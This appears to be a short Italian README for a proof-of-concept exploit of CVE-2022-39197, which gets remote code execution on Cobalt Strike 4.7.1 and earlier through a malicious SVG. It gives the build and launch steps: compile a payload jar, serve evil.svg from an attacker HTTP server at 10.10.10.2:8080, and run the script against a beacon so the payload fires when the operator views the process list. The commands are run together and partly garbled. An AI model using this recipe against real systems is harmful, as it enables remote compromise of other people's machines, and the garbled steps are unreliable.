
Exploit proof-of-concept per CVE-2022-39197, che consente l'esecuzione remota di codice su CobaltStrike <= 4.7.1 tramite payload SVG dannoso servito via HTTP.
Line 19 con il tuo payload in EvilJar/src/main/java/Exploit.javamvn clean compile assembly:singleEvilJar-1.0-jar-with-dependencies.jar dalla cartella EvilJar/target/ alla cartella serve/serve\evil.svg e sostituisci [attacker]python3 -m http.server 8080python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
Il payload verrà attivato non appena l'utente scorre l'elenco dei processi

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — C'è un'ottima analisi approfondita di questa vulnerabilità https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html